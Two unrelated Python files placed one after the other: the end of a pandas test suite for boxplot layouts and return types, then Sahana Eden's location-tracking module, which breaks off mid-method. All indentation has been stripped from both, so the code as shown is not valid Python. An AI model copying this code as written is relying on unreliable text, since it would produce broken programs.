# GH: 26214
df = DataFrame(np.random.rand(10, 2))
with pytest.raises(ValueError, match=msg):
df.boxplot(color=dict_colors, return_type="dict")
@pytest.mark.parametrize(
"props, expected",
[
("boxprops", "boxes"),
("whiskerprops", "whiskers"),
("capprops", "caps"),
("medianprops", "medians"),
],
)
def test_specified_props_kwd(self, props, expected):
# GH 30346
df = DataFrame({k: np.random.random(100) for k in "ABC"})
kwd = {props: {"color": "C1"}}
result = df.boxplot(return_type="dict", **kwd)
assert result[expected][0].get_color() == "C1"
@td.skip_if_no_mpl
class TestDataFrameGroupByPlots(TestPlotBase):
def test_boxplot_legacy1(self):
grouped = self.hist_df.groupby(by="gender")
with tm.assert_produces_warning(UserWarning):
axes = _check_plot_works(grouped.boxplot, return_type="axes")
self._check_axes_shape(list(axes.values), axes_num=2, layout=(1, 2))
axes = _check_plot_works(grouped.boxplot, subplots=False, return_type="axes")
self._check_axes_shape(axes, axes_num=1, layout=(1, 1))
def test_boxplot_legacy2(self):
tuples = zip(string.ascii_letters[:10], range(10))
df = DataFrame(np.random.rand(10, 3), index=MultiIndex.from_tuples(tuples))
grouped = df.groupby(level=1)
with tm.assert_produces_warning(UserWarning):
axes = _check_plot_works(grouped.boxplot, return_type="axes")
self._check_axes_shape(list(axes.values), axes_num=10, layout=(4, 3))
axes = _check_plot_works(grouped.boxplot, subplots=False, return_type="axes")
self._check_axes_shape(axes, axes_num=1, layout=(1, 1))
def test_boxplot_legacy3(self):
tuples = zip(string.ascii_letters[:10], range(10))
df = DataFrame(np.random.rand(10, 3), index=MultiIndex.from_tuples(tuples))
grouped = df.unstack(level=1).groupby(level=0, axis=1)
with tm.assert_produces_warning(UserWarning):
axes = _check_plot_works(grouped.boxplot, return_type="axes")
self._check_axes_shape(list(axes.values), axes_num=3, layout=(2, 2))
axes = _check_plot_works(grouped.boxplot, subplots=False, return_type="axes")
self._check_axes_shape(axes, axes_num=1, layout=(1, 1))
def test_grouped_plot_fignums(self):
n = 10
weight = Series(np.random.normal(166, 20, size=n))
height = Series(np.random.normal(60, 10, size=n))
with tm.RNGContext(42):
gender = np.random.choice(["male", "female"], size=n)
df = DataFrame({"height": height, "weight": weight, "gender": gender})
gb = df.groupby("gender")
res = gb.plot()
assert len(self.plt.get_fignums()) == 2
assert len(res) == 2
tm.close()
res = gb.boxplot(return_type="axes")
assert len(self.plt.get_fignums()) == 1
assert len(res) == 2
tm.close()
# now works with GH 5610 as gender is excluded
res = df.groupby("gender").hist()
tm.close()
def test_grouped_box_return_type(self):
df = self.hist_df
# old style: return_type=None
result = df.boxplot(by="gender")
assert isinstance(result, np.ndarray)
self._check_box_return_type(
result, None, expected_keys=["height", "weight", "category"]
)
# now for groupby
result = df.groupby("gender").boxplot(return_type="dict")
self._check_box_return_type(result, "dict", expected_keys=["Male", "Female"])
columns2 = "X B C D A G Y N Q O".split()
df2 = DataFrame(np.random.randn(50, 10), columns=columns2)
categories2 = "A B C D E F G H I J".split()
df2["category"] = categories2 * 5
for t in ["dict", "axes", "both"]:
returned = df.groupby("classroom").boxplot(return_type=t)
self._check_box_return_type(returned, t, expected_keys=["A", "B", "C"])
returned = df.boxplot(by="classroom", return_type=t)
self._check_box_return_type(
returned, t, expected_keys=["height", "weight", "category"]
)
returned = df2.groupby("category").boxplot(return_type=t)
self._check_box_return_type(returned, t, expected_keys=categories2)
returned = df2.boxplot(by="category", return_type=t)
self._check_box_return_type(returned, t, expected_keys=columns2)
def test_grouped_box_layout(self):
df = self.hist_df
msg = "Layout of 1x1 must be larger than required size 2"
with pytest.raises(ValueError, match=msg):
df.boxplot(column=["weight", "height"], by=df.gender, layout=(1, 1))
msg = "The 'layout' keyword is not supported when 'by' is None"
with pytest.raises(ValueError, match=msg):
df.boxplot(
column=["height", "weight", "category"],
layout=(2, 1),
return_type="dict",
)
msg = "At least one dimension of layout must be positive"
with pytest.raises(ValueError, match=msg):
df.boxplot(column=["weight", "height"], by=df.gender, layout=(-1, -1))
# _check_plot_works adds an ax so catch warning. see GH #13188
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("gender").boxplot, column="height", return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=2, layout=(1, 2))
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("category").boxplot, column="height", return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(2, 2))
# GH 6769
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("classroom").boxplot, column="height", return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(2, 2))
# GH 5897
axes = df.boxplot(
column=["height", "weight", "category"], by="gender", return_type="axes"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(2, 2))
for ax in [axes["height"]]:
self._check_visible(ax.get_xticklabels(), visible=False)
self._check_visible([ax.xaxis.get_label()], visible=False)
for ax in [axes["weight"], axes["category"]]:
self._check_visible(ax.get_xticklabels())
self._check_visible([ax.xaxis.get_label()])
box = df.groupby("classroom").boxplot(
column=["height", "weight", "category"], return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(2, 2))
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("category").boxplot,
column="height",
layout=(3, 2),
return_type="dict",
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(3, 2))
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("category").boxplot,
column="height",
layout=(3, -1),
return_type="dict",
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(3, 2))
box = df.boxplot(
column=["height", "weight", "category"], by="gender", layout=(4, 1)
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(4, 1))
box = df.boxplot(
column=["height", "weight", "category"], by="gender", layout=(-1, 1)
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(3, 1))
box = df.groupby("classroom").boxplot(
column=["height", "weight", "category"], layout=(1, 4), return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(1, 4))
box = df.groupby("classroom").boxplot( # noqa
column=["height", "weight", "category"], layout=(1, -1), return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(1, 3))
def test_grouped_box_multiple_axes(self):
# GH 6970, GH 7069
df = self.hist_df
# Check the warning about ignoring sharex / sharey.
# This check should be done in the first function which passes
# multiple axes to plot, hist or boxplot. Its location should be
# changed if another test with an earlier alphabetical order is added.
with tm.assert_produces_warning(UserWarning):
fig, axes = self.plt.subplots(2, 2)
df.groupby("category").boxplot(column="height", return_type="axes", ax=axes)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(2, 2))
fig, axes = self.plt.subplots(2, 3)
with tm.assert_produces_warning(UserWarning):
returned = df.boxplot(
column=["height", "weight", "category"],
by="gender",
return_type="axes",
ax=axes[0],
)
returned = np.array(list(returned.values))
self._check_axes_shape(returned, axes_num=3, layout=(1, 3))
tm.assert_numpy_array_equal(returned, axes[0])
assert returned[0].figure is fig
# draw on second row
with tm.assert_produces_warning(UserWarning):
returned = df.groupby("classroom").boxplot(
column=["height", "weight", "category"], return_type="axes", ax=axes[1]
)
returned = np.array(list(returned.values))
self._check_axes_shape(returned, axes_num=3, layout=(1, 3))
tm.assert_numpy_array_equal(returned, axes[1])
assert returned[0].figure is fig
msg = "The number of passed axes must be 3, the same as the output plot"
with pytest.raises(ValueError, match=msg):
fig, axes = self.plt.subplots(2, 3)
# pass different number of axes from required
with tm.assert_produces_warning(UserWarning):
axes = df.groupby("classroom").boxplot(ax=axes)
def test_fontsize(self):
df = DataFrame({"a": [1, 2, 3, 4, 5, 6], "b": [0, 0, 0, 1, 1, 1]})
self._check_ticks_props(
df.boxplot("a", by="b", fontsize=16), xlabelsize=16, ylabelsize=16
)
@pytest.mark.parametrize(
"col, expected_xticklabel",
[
("v", ["(a, v)", "(b, v)", "(c, v)", "(d, v)", "(e, v)"]),
(["v"], ["(a, v)", "(b, v)", "(c, v)", "(d, v)", "(e, v)"]),
("v1", ["(a, v1)", "(b, v1)", "(c, v1)", "(d, v1)", "(e, v1)"]),
(
["v", "v1"],
[
"(a, v)",
"(a, v1)",
"(b, v)",
"(b, v1)",
"(c, v)",
"(c, v1)",
"(d, v)",
"(d, v1)",
"(e, v)",
"(e, v1)",
],
),
(
None,
[
"(a, v)",
"(a, v1)",
"(b, v)",
"(b, v1)",
"(c, v)",
"(c, v1)",
"(d, v)",
"(d, v1)",
"(e, v)",
"(e, v1)",
],
),
],
)
def test_groupby_boxplot_subplots_false(self, col, expected_xticklabel):
# GH 16748
df = DataFrame(
{
"cat": np.random.choice(list("abcde"), 100),
"v": np.random.rand(100),
"v1": np.random.rand(100),
}
)
grouped = df.groupby("cat")
axes = _check_plot_works(
grouped.boxplot, subplots=False, column=col, return_type="axes"
)
result_xticklabel = [x.get_text() for x in axes.get_xticklabels()]
assert expected_xticklabel == result_xticklabel
def test_boxplot_multiindex_column(self):
# GH 16748
arrays = [
["bar", "bar", "baz", "baz", "foo", "foo", "qux", "qux"],
["one", "two", "one", "two", "one", "two", "one", "two"],
]
tuples = list(zip(*arrays))
index = MultiIndex.from_tuples(tuples, names=["first", "second"])
df = DataFrame(np.random.randn(3, 8), index=["A", "B", "C"], columns=index)
col = [("bar", "one"), ("bar", "two")]
axes = _check_plot_works(df.boxplot, column=col, return_type="axes")
expected_xticklabel = ["(bar, one)", "(bar, two)"]
result_xticklabel = [x.get_text() for x in axes.get_xticklabels()]
assert expected_xticklabel == result_xticklabel
|
|
# -*- coding: utf-8 -*-
""" Simple Generic Location Tracking System
@copyright: 2011-14 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from datetime import datetime, timedelta
from gluon import current
from gluon.storage import Storage
try:
from gluon.dal.objects import Table, Rows, Row
except ImportError:
# old web2py
from gluon.dal import Table, Rows, Row
from gluon.html import *
from s3rest import S3Method
__all__ = ("S3Tracker",
"S3CheckInMethod",
"S3CheckOutMethod",
)
UID = "uuid" # field name for UIDs
TRACK_ID = "track_id" # field name for track ID
LOCATION_ID = "location_id" # field name for base location
LOCATION = "gis_location" # location tablename
PRESENCE = "sit_presence" # presence tablename
# =============================================================================
class S3Trackable(object):
"""
Instance(s) of trackable types
"""
def __init__(self, table=None, tablename=None, record=None, query=None,
record_id=None, record_ids=None, rtable=None):
"""
Constructor:
@param table: a Table object
@param tablename: a Str tablename
@param record: a Row object
@param query: a Query object
@param record_id: a record ID (if object is a Table)
@param record_ids: a list of record IDs (if object is a Table)
- these should be in ascending order
@param rtable: the resource table (for the recursive calls)
"""
db = current.db
s3db = current.s3db
self.records = []
self.table = s3db.sit_trackable
self.rtable = rtable
# if isinstance(trackable, (Table, str)):
# if hasattr(trackable, "_tablename"):
# table = trackable
# tablename = table._tablename
# else:
# table = s3db[trackable]
# tablename = trackable
# fields = self.__get_fields(table)
# if not fields:
# raise SyntaxError("Not a trackable type: %s" % tablename)
# query = (table._id > 0)
# if uid is None:
# if record_id is not None:
# if isinstance(record_id, (list, tuple)):
# query = (table._id.belongs(record_id))
# else:
# query = (table._id == record_id)
# elif UID in table.fields:
# if not isinstance(uid, (list, tuple)):
# query = (table[UID].belongs(uid))
# else:
# query = (table[UID] == uid)
# fields = [table[f] for f in fields]
# rows = db(query).select(*fields)
if table or tablename:
if table:
tablename = table._tablename
else:
table = s3db[tablename]
fields = self.__get_fields(table)
if not fields:
raise SyntaxError("Not a trackable type: %s" % tablename)
if record_ids:
query = (table._id.belongs(record_ids))
limitby = (0, len(record_ids))
orderby = table._id
elif record_id:
query = (table._id == record_id)
limitby = (0, 1)
orderby = None
else:
query = (table._id > 0)
limitby = None
orderby = table._id
fields = [table[f] for f in fields]
rows = db(query).select(limitby=limitby, orderby=orderby, *fields)
# elif isinstance(trackable, Row):
# fields = self.__get_fields(trackable)
# if not fields:
# raise SyntaxError("Required fields not present in the row")
# rows = Rows(records=[trackable], compact=False)
elif record:
fields = self.__get_fields(record)
if not fields:
raise SyntaxError("Required fields not present in the row")
rows = Rows(records=[record], compact=False)
# elif isinstance(trackable, Rows):
# rows = [r for r in trackable if self.__get_fields(r)]
# fail = len(trackable) - len(rows)
# if fail:
# raise SyntaxError("Required fields not present in %d of the rows" % fail)
# rows = Rows(records=rows, compact=False)
# elif isinstance(trackable, (Query, Expression)):
# tablename = db._adapter.get_table(trackable)
# self.rtable = s3db[tablename]
# fields = self.__get_fields(self.rtable)
# if not fields:
# raise SyntaxError("Not a trackable type: %s" % tablename)
# query = trackable
# fields = [self.rtable[f] for f in fields]
# rows = db(query).select(*fields)
elif query:
tablename = db._adapter.get_table(query)
self.rtable = s3db[tablename]
fields = self.__get_fields(self.rtable)
if not fields:
raise SyntaxError("Not a trackable type: %s" % tablename)
fields = [self.rtable[f] for f in fields]
rows = db(query).select(*fields)
# elif isinstance(trackable, Set):
# query = trackable.query
# tablename = db._adapter.get_table(query)
# table = s3db[tablename]
# fields = self.__get_fields(table)
# if not fields:
# raise SyntaxError("Not a trackable type: %s" % tablename)
# fields = [table[f] for f in fields]
# rows = trackable.select(*fields)
else:
raise SyntaxError("Invalid parameters")
records = []
for r in rows:
if self.__super_entity(r):
table = s3db[r.instance_type]
fields = self.__get_fields(table, super_entity=False)
if not fields:
raise SyntaxError("No trackable type: %s" % table._tablename)
fields = [table[f] for f in fields]
query = table[UID] == r[UID]
row = db(query).select(limitby=(0, 1), *fields).first()
if row:
records.append(row)
else:
records.append(r)
self.records = Rows(records=records, compact=False)
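# Illustrative sketch (not part of the original module): the constructor
# accepts several equivalent ways of selecting the records to track, e.g.
# (assuming a configured web2py/S3 environment and that 'pr_person' is a
# trackable type):
#
#   S3Trackable(tablename="pr_person", record_id=5)
#   S3Trackable(table=current.s3db.pr_person, record_ids=[1, 2, 3])
#   S3Trackable(record=person_row)
#   S3Trackable(query=(current.s3db.pr_person.id > 0))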
# -------------------------------------------------------------------------
@staticmethod
def __super_entity(trackable):
"""
Check whether a trackable is a super-entity
@param trackable: the trackable object
"""
if hasattr(trackable, "fields"):
keys = trackable.fields
else:
keys = trackable
return "instance_type" in keys
# -------------------------------------------------------------------------
def __get_fields(self, trackable, super_entity=True):
"""
Check a trackable for presence of required fields
@param trackable: the trackable object
@param super_entity: also recognize super-entities (instance_type/UID)
"""
fields = []
if hasattr(trackable, "fields"):
keys = trackable.fields
else:
keys = trackable
try:
if super_entity and \
self.__super_entity(trackable) and UID in keys:
return ("instance_type", UID)
if LOCATION_ID in keys:
fields.append(LOCATION_ID)
if TRACK_ID in keys:
fields.append(TRACK_ID)
return fields
elif hasattr(trackable, "update_record") or \
isinstance(trackable, Table) or \
isinstance(trackable, Row):
return fields
except:
pass
return None
# -------------------------------------------------------------------------
def get_location(self,
timestmp=None,
_fields=None,
_filter=None,
as_rows=False,
exclude=[]):
"""
Get the current location of the instance(s) (at the given time)
@param timestmp: last datetime for presence (defaults to current time)
@param _fields: fields to retrieve from the location records (None for ALL)
@param _filter: filter for the locations
@param as_rows: return the result as Rows object
@param exclude: interlocks to break at (avoids circular check-ins)
@return: a location record, or a list of location records (if multiple)
@ToDo: Also show Timestamp of when seen there
"""
db = current.db
s3db = current.s3db
ptable = s3db[PRESENCE]
ltable = s3db[LOCATION]
if timestmp is None:
timestmp = datetime.utcnow()
locations = []
for r in self.records:
location = None
if TRACK_ID in r:
query = ((ptable.deleted == False) & \
(ptable[TRACK_ID] == r[TRACK_ID]) & \
(ptable.timestmp <= timestmp))
presence = db(query).select(orderby=~ptable.timestmp,
limitby=(0, 1)).first()
if presence:
if presence.interlock:
exclude = [r[TRACK_ID]] + exclude
tablename, record_id = presence.interlock.split(",", 1)
trackable = S3Trackable(tablename=tablename, record_id=record_id)
record = trackable.records.first()
if TRACK_ID not in record or \
record[TRACK_ID] not in exclude:
location = trackable.get_location(timestmp=timestmp,
exclude=exclude,
_fields=_fields,
as_rows=True).first()
elif presence.location_id:
query = (ltable.id == presence.location_id)
if _filter is not None:
query = query & _filter
if _fields is None:
location = db(query).select(ltable.ALL,
limitby=(0, 1)).first()
else:
location = db(query).select(limitby=(0, 1),
*_fields).first()
if not location:
if len(self.records) > 1:
trackable = S3Trackable(record=r, rtable=self.rtable)
else:
trackable = self
location = trackable.get_base_location(_fields=_fields)
if location:
locations.append(location)
else:
# Ensure we return an entry so that indexes match
locations.append(Row({"lat": None, "lon": None}))
if as_rows:
return Rows(records=locations, compact=False)
if not locations:
return None
else:
return locations
# -------------------------------------------------------------------------
def set_location(self, location, timestmp=None):
"""
Set the current location of instance(s) (at the given time)
@param location: the location (as Row or record ID)
@param timestmp: the datetime of the presence (defaults to current time)
@return: nothing
"""
ptable = current.s3db[PRESENCE]
if timestmp is None:
timestmp = datetime.utcnow()
if isinstance(location, S3Trackable):
location = location.get_base_location()
if isinstance(location, Rows):
location = location.first()
if isinstance(location, Row):
if "location_id" in location:
location = location.location_id
else:
location = location.id
if not location:
return
else:
data = dict(location_id=location, timestmp=timestmp)
for r in self.records:
if TRACK_ID not in r:
# No track ID => set base location
if len(self.records) > 1:
trackable = S3Trackable(record=r)
else:
trackable = self
trackable.set_base_location(location)
elif r[TRACK_ID]:
data.update({TRACK_ID:r[TRACK_ID]})
ptable.insert(**data)
self.__update_timestamp(r[TRACK_ID], timestmp)
return location
# -------------------------------------------------------------------------
def check_in(self, table, record, timestmp=None):
"""
Bind the presence of the instance(s) to another instance
@param table: table name of the other resource
@param record: record in the other resource (as Row or record ID)
@param timestmp: datetime of the check-in
@return: nothing
"""
db = current.db
s3db = current.s3db
ptable = s3db[PRESENCE]
if isinstance(table, str):
table = s3db[table]
fields = self.__get_fields(table)
if not fields:
raise SyntaxError("No location data in %s" % table._tablename)
interlock = None
if isinstance(record, Rows):
record = record.first()
if not isinstance(record, Row):
record = table[record]
if self.__super_entity(record):
table = s3db[record.instance_type]
fields = self.__get_fields(table, super_entity=False)
if not fields:
raise SyntaxError("No trackable type: %s" % table._tablename)
query = table[UID] == record[UID]
record = db(query).select(limitby=(0, 1)).first()
if record and table._id.name in record:
record = record[table._id.name]
if record:
interlock = "%s,%s" % (table, record)
else:
raise SyntaxError("No record specified for %s" % table._tablename)
if interlock:
if timestmp is None:
timestmp = datetime.utcnow()
data = dict(location_id=None,
timestmp=timestmp,
interlock=interlock)
q = ((ptable.deleted == False) & (ptable.timestmp <= timestmp))
for r in self.records:
if TRACK_ID not in r:
# Cannot check-in a non-trackable
continue
query = q & (ptable[TRACK_ID] == r[TRACK_ID])
presence = db(query).select(orderby=~ptable.timestmp,
limitby=(0, 1)).first()
if presence and presence.interlock == interlock:
# already checked-in to the same instance
continue
data.update({TRACK_ID:r[TRACK_ID]})
ptable.insert(**data)
self.__update_timestamp(r[TRACK_ID], timestmp)
# -------------------------------------------------------------------------
def check_out(self, table=None, record=None, timestmp=None):
"""
Make the last log entry before timestmp independent of
the referenced entity (if any)
@param table: the table (or tablename) of the entity to check out from (optional)
@param record: the record in that entity (as Row or record ID)
@param timestmp: the date/time of the check-out, defaults
to current time
"""
db = current.db
s3db = current.s3db
ptable = s3db[PRESENCE]
if timestmp is None:
timestmp = datetime.utcnow()
interlock = None
if table is not None:
if isinstance(table, str):
table = s3db[table]
if isinstance(record, Rows):
record = record.first()
if self.__super_entity(table):
if not isinstance(record, Row):
record = table[record]
table = s3db[record.instance_type]
fields = self.__get_fields(table, super_entity=False)
if not fields:
raise SyntaxError("No trackable type: %s" % table._tablename)
query = table[UID] == record[UID]
record = db(query).select(limitby=(0, 1)).first()
if isinstance(record, Row) and table._id.name in record:
record = record[table._id.name]
if record:
interlock = "%s,%s" % (table, record)
else:
return
q = ((ptable.deleted == False) & (ptable.timestmp <= timestmp))
for r in self.records:
if TRACK_ID not in r:
# Cannot check-out a non-trackable
continue
query = q & (ptable[TRACK_ID] == r[TRACK_ID])
presence = db(query).select(orderby=~ptable.timestmp,
limitby=(0, 1)).first()
if presence and presence.interlock:
if interlock and presence.interlock != interlock:
continue
elif not interlock and table and \
not presence.interlock.startswith("%s" % table):
continue
tablename, record_id = presence.interlock.split(",", 1)
trackable = S3Trackable(tablename=tablename, record_id=record_id)
location = trackable.get_location(_fields=["id"],
timestmp=timestmp,
as_rows=True).first()
if timestmp - presence.timestmp < timedelta(seconds=1):
timestmp = timestmp + timedelta(seconds=1)
data = dict(location_id=location.id,
timestmp=timestmp,
interlock=None)
data.update({TRACK_ID:r[TRACK_ID]})
ptable.insert(**data)
self.__update_timestamp(r[TRACK_ID], timestmp)
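# Illustrative sketch (not part of the original module) of how the presence
# log methods above interact, assuming 'pr_person' and 'cr_shelter' are
# configured as trackable types and the IDs below exist:
#
#   person = S3Trackable(tablename="pr_person", record_id=person_id)
#   person.set_location(location_id)            # log a presence at a location
#   person.check_in("cr_shelter", shelter_id)   # interlock with the shelter
#   person.get_location()                       # now resolves via the shelter
#   person.check_out("cr_shelter", shelter_id)  # log an independent entry again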
# -------------------------------------------------------------------------
def remove_location(self, location=None):
"""
Remove a location from the presence log of the instance(s)
@todo: implement
"""
raise NotImplementedError
# -------------------------------------------------------------------------
def get_base_location(self,
_fields=None,
_filter=None,
as_rows=False):
"""
Get the base location of the instance(s)
@param _fields: fields to retrieve from the location records (None for ALL)
@param _filter: filter for the locations
@param as_rows: return the result as Rows object
@return: the base location(s) of the current instance
"""
db = current.db
s3db = current.s3db
ltable = s3db[LOCATION]
rtable = self.rtable
locations = []
for r in self.records:
location = None
query = None
if LOCATION_ID in r:
query = (ltable.id == r[LOCATION_ID])
if rtable:
query = query & (rtable[LOCATION_ID] == ltable.id)
if TRACK_ID in r:
query = query & (rtable[TRACK_ID] == r[TRACK_ID])
elif TRACK_ID in r:
q = (self.table[TRACK_ID] == r[TRACK_ID])
trackable = db(q).select(limitby=(0, 1)).first()
table = s3db[trackable.instance_type]
if LOCATION_ID in table.fields:
query = ((table[TRACK_ID] == r[TRACK_ID]) &
(table[LOCATION_ID] == ltable.id))
if query:
if _filter is not None:
query = query & _filter
if not _fields:
location = db(query).select(ltable.ALL,
limitby=(0, 1)).first()
else:
location = db(query).select(limitby=(0, 1),
*_fields).first()
if location:
locations.append(location)
else:
# Ensure we return an entry so that indexes match
locations.append(Row({"lat": None, "lon": None}))
if as_rows:
return Rows(records=locations, compact=False)
if not locations:
return None
elif len(locations) == 1:
return locations[0]
else:
return locations
# -------------------------------------------------------------------------
def set_base_location(self, location=None):
"""
Set the base location of the instance(s)
@param location: the location for the base location as Row or record ID
@return: nothing
@note: instance tables without a location_id field will be ignored
"""
if isinstance(location, S3Trackable):
location = location.get_base_location()
if isinstance(location, Rows):
location = location.first()
if isinstance(location, Row):
location.get("id", None)
if not location or not str(location).isdigit():
# Location not found
return
else:
data = {LOCATION_ID:location}
# Update records without track ID
for r in self.records:
if TRACK_ID in r:
continue
elif LOCATION_ID in r:
if hasattr(r, "update_record"):
r.update_record(**data)
else:
raise SyntaxError("Cannot relate record to a table.")
db = current.db
s3db = current.s3db
# Update records with track ID
# => this can happen table-wise = less queries
track_ids = [r[TRACK_ID] for r in self.records if TRACK_ID in r]
rows = db(self.table[TRACK_ID].belongs(track_ids)).select()
tables = []
append = tables.append
types = set()
seen = types.add
for r in rows:
instance_type = r.instance_type
if instance_type not in types:
seen(instance_type)
table = s3db[instance_type]
if instance_type not in tables and LOCATION_ID in table.fields:
append(table)
else:
# No location ID in this type => ignore gracefully
continue
# Location specified => update all base locations
for table in tables:
db(table[TRACK_ID].belongs(track_ids)).update(**data)
# Refresh records
for r in self.records:
if LOCATION_ID in r:
r[LOCATION_ID] = location
return location
# -------------------------------------------------------------------------
def __update_timestamp(self, track_id, timestamp):
"""
Update the timestamp of a trackable
@param track_id: the trackable ID (super-entity key)
@param timestamp: the timestamp
"""
if timestamp is None:
timestamp = datetime.utcnow()
if track_id:
trackable = self.table[track_id]
if trackable:
trackable.update_record(track_timestmp=timestamp)
# =============================================================================
class S3Tracker(object):
"""
S3 Tracking system; can be instantiated once as the global 's3tracker' object
"""
def __init__(self):
"""
Constructor
"""
# -------------------------------------------------------------------------
def __call__(self, table=None, record_id=None, record_ids=None,
tablename=None, record=None, query=None):
"""
Get a tracking interface for a record or set of records
@param table: a Table object
@param record_id: a record ID (together with Table or tablename)
@param record_ids: a list/tuple of record IDs (together with Table or tablename)
@param tablename: a Str object
@param record: a Row object
@param query: a Query object
@return: a S3Trackable instance for the specified record(s)
"""
return S3Trackable(table=table,
tablename=tablename,
record_id=record_id,
record_ids=record_ids,
record=record,
query=query,
)
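# Illustrative sketch (not part of the original module): the intended usage
# is a single global instance that is called to obtain trackable interfaces
# (names below are assumptions for the example):
#
#   s3tracker = S3Tracker()
#   shelter = s3tracker(tablename="cr_shelter", record_id=shelter_id)
#   shelter.set_base_location(location_id)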
# -------------------------------------------------------------------------
def get_all(self, entity,
location=None,
bbox=None,
timestmp=None):
"""
Get all instances of the given entity at the given location and time
"""
raise NotImplementedError
# -------------------------------------------------------------------------
def get_checked_in(self, table, record,
instance_type=None,
timestmp=None):
"""
Get all trackables of the given type that are checked-in
to the given instance at the given time
"""
raise NotImplementedError
# =============================================================================
class S3CheckInMethod(S3Method):
"""
Custom Method to allow a trackable resource to check-in
"""
# -------------------------------------------------------------------------
@staticmethod
def apply_method(r, **attr):
"""
Apply method.
@param r: the S3Request
@param attr: controller options for this request
"""
if r.representation == "html":
T = current.T
s3db = current.s3db
response = current.response
table = r.table
tracker = S3Trackable(table, record_id=r.id)
title = T("Check-In")
get_vars = r.get_vars
# Are we being passed a location_id?
location_id = get_vars.get("location_id", None)
if not location_id:
# Are we being passed a lat and lon?
lat = get_vars.get("lat", None)
if lat is not None:
lon = get_vars.get("lon", None)
if lon is not None:
form_vars = Storage(lat = float(lat),
lon = float(lon),
)
form = Storage(vars=form_vars)
s3db.gis_location_onvalidation(form)
location_id = s3db.gis_location.insert(**form_vars)
form = None
if not location_id:
# Give the user a form to check-in
# Test the formstyle
formstyle = current.deployment_settings.get_ui_formstyle()
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "location_id"
label = LABEL("%s:" % T("Location"))
from s3.s3widgets import S3LocationSelector
field = table.location_id
#value = tracker.get_location(_fields=["id"],
# as_rows=True).first().id
value = None # We always want to create a new Location, not update the existing one
widget = S3LocationSelector()(field, value)
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Check-In"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(current.request.vars, current.session):
location_id = form.vars.get("location_id", None)
if location_id:
# We're not Checking-in in S3Track terms (that's about interlocking with another object)
#tracker.check_in()
#timestmp = form.vars.get("timestmp", None)
#if timestmp:
# # @ToDo: Convert from string
# pass
#tracker.set_location(location_id, timestmp=timestmp)
tracker.set_location(location_id)
response.confirmation = T("Checked-In successfully!")
response.view = "check-in.html"
output = dict(form = form,
title = title,
)
return output
# @ToDo: JSON representation for check-in from mobile devices
else:
raise HTTP(501, current.ERROR.BAD_METHOD)
# =============================================================================
class S3CheckOutMethod(S3Method):
"""
Custom Method to allow a trackable resource to check-out
"""
# -------------------------------------------------------------------------
@staticmethod
def apply_method(r, **attr):
"""
Apply method.
@param r: the S3Request
@param attr: controller options for this request
"""
if r.representation == "html":
T = current.T
s3db = current.s3db
response = current.response
tracker = S3Trackable(r.table, record_id=r.id)
title = T("Check-Out")
# Give the user a form to check-out
# Test the formstyle
formstyle = current.deployment_settings.get_ui_formstyle()
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Check-Out"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(current.request.vars, current.session):
# Check-Out
# We're not Checking-out in S3Track terms (that's about removing an interlock with another object)
# What we're doing is saying that we're now back at our base location
#tracker.check_out()
